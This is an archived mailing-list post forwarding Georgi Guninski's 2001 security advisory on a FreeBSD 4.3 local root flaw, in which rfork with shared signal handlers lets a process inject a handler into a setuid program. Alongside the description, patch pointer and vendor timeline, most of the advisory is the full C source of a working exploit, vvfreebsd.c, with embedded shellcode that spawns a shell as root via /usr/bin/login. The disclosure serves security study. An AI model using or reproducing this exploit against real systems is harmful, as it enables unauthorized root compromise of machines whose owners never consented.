Fw: FreeBSD 4.3 local root, yet Linux and *BSD much better than

• Next message: Bernino Lind: "RE: Hitlines (WAS: Hvad laver Poul-Henning Kamp dog her? )"
• Previous message: Thomas Ammitzbøll-Bach: "Hitlines (WAS: Hvad laver Poul-Henning Kamp dog her? )"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
• Mail actions: [ respond to this message ] [ mail a new topic ]

From: Søren Klintrup <none@skl--uni2.dk.lh.bsd-dk.dk>
To: <none@bsd-dk--bsd-dk.dk.lh.bsd-dk.dk>
Subject: Fw: FreeBSD 4.3 local root, yet Linux and *BSD much better than
Date: Wed, 11 Jul 2001 10:44:27 +0200

Well .... det er godt man ikke har brugere inde på sit system :p

/Søren

>
> ----- Original Message -----
> From: "Georgi Guninski" <none@guninski--guninski.com.lh.bsd-dk.dk>
> To: <none@security--guninski.com.lh.bsd-dk.dk>
> Sent: Tuesday, July 10, 2001 1:31 PM
> Subject: FreeBSD 4.3 local root, yet Linux and *BSD much better than
>
>
> > Windows
> > Content-Type: text/plain; charset=us-ascii
> > Content-Transfer-Encoding: 7bit
> > Sender: owner-security@guninski.com
> > Precedence: bulk
> > Reply-To: Georgi Guninski <none@guninski--guninski.com.lh.bsd-dk.dk>
> >
> > Georgi Guninski security advisory #48, 2001
> >
> > FreeBSD 4.3 local root, yet Linux and *BSD much better than Windows
> >
> > Systems affected:
> > FreeBSD 4.3 and probably earlier versions.
> >
> > Risk: High
> > Date: 10 July 2001
> >
> > Legal Notice:
> > This Advisory is Copyright (c) 2001 Georgi Guninski.
> > You may distribute it unmodified.
> > You may not modify it and distribute it or distribute parts
> > of it without the author's written permission.
> >
> > Disclaimer:
> > The information in this advisory is believed to be true based on
> > experiments though it may be false.
> > The opinions expressed in this advisory and program are my own and
> > not of any company. The usual standard disclaimer applies,
> > especially the fact that Georgi Guninski is not liable for any damages
> > caused by direct or indirect use of the information or functionality
> > provided by this advisory or program. Georgi Guninski bears no
> > responsibility for content or misuse of this advisory or program or
> > any derivatives thereof.
> >
> >
> > Description:
> >
> > There is local root compromise in FreeBSD 4.3 due to design flaw
> > which allows injecting signal handlers in other processes.
> >
> >
> > Details:
> > The problem is rfork(RFPROC|RFSIGSHARE) which shares the signal
> > handlers.
> > If the child does exec() on a setuid program and then the parent set a
> > signal handler, the signal handler is replicated in the child.
> > The address of the signal handler may be in the environment and after
> > sending
> > a signal to the child our signal handler gets executed.
> > Examine the code for more information.
> >
> >
> >
> > Exploit:
> >
> > Examine the source and don't send me mail if you get SEGV.
> > http://www.guninski.com/vvfreebsd.c
> >
> > -------------vvfreebsd.c----------------------
> >
> > /*
> > FreeBSD 4.3 local root exploit using shared signals.
> > Written by Georgi Guninski http://www.guninski.com
> > */
> >
> > #include <stdio.h>
> > #include <signal.h>
> > #include <unistd.h>
> > int vv1;
> >
> > #define MYSIG SIGINT
> >
> >
> > //exec "/tmp/sh", shellcode gotten from the internet and modified
> > unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
> > "\x31\xc0\x50\x50\xb0\x17\xcd\x80"
> > "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
> > "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
> > "\xb0\x3b\x50\xcd\x80\x90\x90\x90";
> >
> > typedef (*PROG)();
> > extern char **environ;
> >
> > int main(int ac,char **av)
> > {
> > int pid;
> > //(*(PROG)bsdshell)();
> > if(!(vv1=getenv("vv")))
> > {
> > setenv("vv",bsdshell,1);
> > if(!execle(av[0],"vv",NULL,environ))
> > {
> > perror("weird exec");
> > exit(1);
> > }
> > }
> >
> > printf("vvfreebsd. Written by Georgi Guninski\n");
> > printf("shall jump to %x\n",vv1);
> >
> > if(!(pid=rfork(RFPROC|RFSIGSHARE)))
> > {
> > printf("child=%d\n",getpid());
> > // /usr/bin/login and rlogin work for me. ping gives nonsuid shell
> > // if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
> > if(!execl("/usr/bin/login","login",0))
> > {
> > perror("exec setuid failed");
> > exit(2);
> > };
> > }
> > sleep(2);
> > signal(MYSIG,(sig_t)vv1);
> > sleep(2);
> > kill(pid,MYSIG);
> > printf("done\n");
> > while(42);
> > }
> >
> >
> >
> >
> > ----------------------------------------------
> >
> > Workaround/Soltution:
> > As far as I know patches for this problem are commited for both
> > -current and -stable.
> > >From "CVS log for src/sys/kern/kern_exec.c"
> > [MFC: do not share sigs after an exec]
> > The main diff seems to be at:
> > http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/kern/kern_exec.c.diff?
> > r1=1.107.2.7&r2=1.107.2.8&f=h
> >
> > Vendor status:
> > FreeBSD was informed on 2 July 2001 (sent them broken attachment on 1
> > July).
> >
> > Some comparison of vendor response times from my personal experience:
> > FreeBSD seem to have fixed this in 7 days.
> > OpenBSD fixed my previous advisory in 6 days.
> > Microsoft are much slower.
> >
> > Regards,
> > Georgi Guninski
> > http://www.guninski.com
> > ----------------------
> > You may visit Guninski Security Mailing List page at
> > http://www.guninski.com/mailinglist.html
> > ----------------------
> >
>

• Next message: Bernino Lind: "RE: Hitlines (WAS: Hvad laver Poul-Henning Kamp dog her? )"
• Previous message: Thomas Ammitzbøll-Bach: "Hitlines (WAS: Hvad laver Poul-Henning Kamp dog her? )"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
• Mail actions: [ respond to this message ] [ mail a new topic ]

This archive was generated by hypermail 2b30 : Wed 15 Nov 2006 - 18:24:12 CET